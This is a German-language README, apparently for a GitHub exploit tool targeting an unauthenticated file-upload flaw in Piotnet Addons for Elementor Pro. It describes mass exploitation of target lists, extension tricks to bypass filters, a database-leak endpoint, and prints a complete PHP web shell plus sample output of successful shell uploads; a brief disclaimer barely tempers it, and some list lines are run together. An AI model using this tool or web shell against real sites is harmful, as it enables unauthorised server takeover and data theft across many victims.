
Piotnet Addons for Elementor Pro <= 7.1.70 - Nicht authentifizierter beliebiger Datei-Upload über Formular-Datei-Upload
Nicht authentifiziertes beliebiges Datei-Upload, das zu Remote Code Execution (RCE) in Piotnet Addons für Elementor Pro ≤ 7.1.70 führt.
Dieses Tool ist für die Massenausnutzung konzipiert – gib ihm eine Liste von Zielen und es wird automatisch:
post_id, form_id und den korrekten Upload-Feldnamen zu extrahieren.phtml, .php3, .php4, .phps, .pht, .php2) ausprobieren, um schwache Filter zu umgehenpafe_export_database leakenLogic_Internet-String suchen) und die URL in shells.txt speichern⚠️ Haftungsausschluss
Dieses Tool dient nur zu Bildungs- und autorisierten Sicherheitstests.
Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören, ist illegal.Weitere Haftungsausschlüsse findest du auf dem Cover von Jenderal92. Du kannst sie HIER !!! überprüfen.
data-pafe-form-builder-field-name, data-elementor-id, usw.)https:// hinzu, falls fehlend/contact, /apply, /quote, /book-appointment, …)wp-content/uploads/piotnet-addons-for-elementor/ als auch direkte Root-Pfaderequests-Bibliothekpip install requests
Installation
git clone https://github.com/Jenderal92/CVE-2026-4885.git
cd CVE-2026-4885
Erstelle eine Datei namens targets.txt (oder einen beliebigen Namen) mit einer URL pro Zeile:
https://example1.com
example2.com
http://vulnerable-site.org
python2 CVE-2026-4885.py targets.txt
Das Skript wird:
· Fortschritt für jedes Ziel anzeigen · Erfolgreiche Shell-URLs in shells.txt speichern
Beispielausgabe
[*] Loaded built-in shell (598 bytes)
[*] scanning 25 pages...
[+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
[*] post_id=13 form_id=fa2c60e field=file
[*] trying .phtml
[+] uploaded .phtml
[+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
[+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
Kommandozeilenoptionen (im Skript anpassbar)
Du kannst diese ändern, indem du den Anfang des Skripts bearbeitest.
Die integrierte Shell ist:
GIF89a;
<?php
echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
Echo '<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center>'.'<br>';
if (!empty ($_FILES['uploads'])) {
move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
?>
· Zeigt Serverinformationen, aktuelles Arbeitsverzeichnis und ein Datei-Upload-Formular an. · Kann durch jeden anderen PHP-Code ersetzt werden (ändere einfach SHELL_CODE im Skript).
UnicodeEncodeError unter Windows
Das Skript enthält bereits eine safe_unicode()-Funktion, die nicht-ASCII-Zeichen behandelt. Wenn du weiterhin Fehler siehst, stelle sicher, dass dein Terminal UTF‑8 unterstützt:
chcp 65001
Kein Formular gefunden / Alle Erweiterungen schlagen fehl
· Das Ziel ist möglicherweise gepatcht oder verwendet keine Piotnet Addons. · Versuche TIMEOUT oder MAX_THREADS zu erhöhen. · Überprüfe manuell, ob das Plugin tatsächlich installiert ist.
Leak schlägt fehl, aber Upload erfolgreich
· Der pafe_export_database-Endpunkt könnte deaktiviert oder geschützt sein. · Versuche, /wp-admin/admin-ajax.php?action=pafe_export_database manuell in einem Browser aufzurufen, um zu sehen, ob er zugänglich ist.
· Verwende dieses Tool nur auf Systemen, für die du eine schriftliche Erlaubnis zum Testen hast. · Der Autor ist nicht verantwortlich für Missbrauch oder verursachte Schäden. · Respektiere alle geltenden Gesetze.
| Variable | Beschreibung | Standardwert |
|---|
| TIMEOUT | HTTP-Request-Timeout | 10 Sekunden |
| MAX_THREADS | Anzahl gleichzeitiger Threads | 20 |
| OUTPUT_FILE | Wo erfolgreiche Shell-URLs gespeichert werden | shells.txt |
| EXT_LIST | Zu probierende Dateierweiterungen | .phtml, .php3, .php4, .phps, .pht, .php2 |